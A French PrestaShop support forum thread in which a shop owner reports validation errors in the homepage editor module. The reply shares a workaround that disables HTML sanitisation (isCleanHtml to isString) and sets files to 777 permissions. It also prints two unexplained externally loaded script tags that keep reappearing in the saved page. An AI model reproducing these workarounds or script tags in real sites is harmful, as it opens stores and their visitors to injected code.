Jump to content

[Problème] Editeur de page d'accueil v1.6 par PrestaShop


A1TH

Recommended Posts

Bonjour,

 

J’ai un souci avec l’éditorial « Editeur de page d'accueil v1.6 par PrestaShop ».

Je suis sur PS 1.4.9.0

En effet, depuis le BO, je n’arrive à faire aucune modification car lorsque que je souhaite enregistrer j’ai le message suivant :

 

Le champ suivant n'est pas valide selon la méthode de validationisCleanHtml:

(EditorialClass->body_paragraph = Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum pour la langue 1)

 

A noter également que lorsque j’ouvre la page Module / Editeur de page d'accueil v1.6 par PrestaShop / Configurer… la page est très longue à se charger et à un certain moment sur Mozilla j’ai une fenetre qui s’ouvre avec ce message :

 

“Script : chrome://yslow/content/yslow/util.js:535” me demandant d’arreter ou continuer.

 

Bref,

J’ai parcouru le forum car, je m’aperçois que je ne suis pas un cas isolé, mais je n’ai trouver aucune vrai solution à mon problème. Je n’arrive toujours pas résoudre.

 

J’ai ouvert le BO à partir du navigateur Opéra et finalement la page s’est chargée rapidement et j’ai réussi à faire des modifs et enregistrer la config normalement.

Mais par contre, en affichant le site, j’ai perdu la mise en page (le titre, le pre-en-tete et le texte se superpose.

 

Bon, je ne sais pas quoi faire pour faire fonctionner ce module normalement.

 

Merci de votre aide.

Link to comment
Share on other sites

Bonjour,

Suite à bcp de lecture et plain d'essai, voici ce que j'ai reussi à faire.

Ca marche, mais ce n'est pas complétement satisfaisant.

 

J'ai modifié le fichier /modules/editorial/EditorialClass.php

'body_paragraph' => 'isCleanHtml',

par

'body_paragraph' => 'isString',

 

Pour ce faire, il a fallu que je change la permission en 777.

J'ai ensuite vidé le dossier tools/smarty/compile/

 

Suite à ceci, je pouvais enfin modifier le texte dans l’éditeur de la page d'accueil sans avoir le message d'erreur validation: isCleanHTML.

Par contre, j'ai toujours du js qui se charge lorsque de j'ouvre l’éditeur de la page d’accueil. Et pour preuve, quand j'ouvre l'éditeur de source HTML, j'ai ceci en dessous de mon texte.

 

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

 

J'ai beau le supprimer, il se régénère à chaque fois que j'enregistre la page d’accueil.

Si j'édite 3 fois, j'aurai 3 fois ce texte qui s'affiche dans l’éditeur de source HTML.

Est-ce normal ? Comment éviter cela ?

Le module éditeur de page d'accueil est très long à s'ouvrir à cause de ces scripts.

 

Autre souci :

Si, je supprime la photo, la mise en page est perdu.

Le Titre principal, le Pré-en-Tete et le texte se superpose.

Le moyen que j'ai trouvé pour rémédier à ce problème est de charger une image de 1px de hauteur de la même couleur que mon background (dans ce cas, on ne la voit pas), et ceci me permet de garder la mise en page.

 

Bref, dans un sens, j'arrive enfin à éditer ma page d'accueil, mais ça me semple pas parfait.

Comment corriger ces bugs.

 

Merci d'avance pour votre aide.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...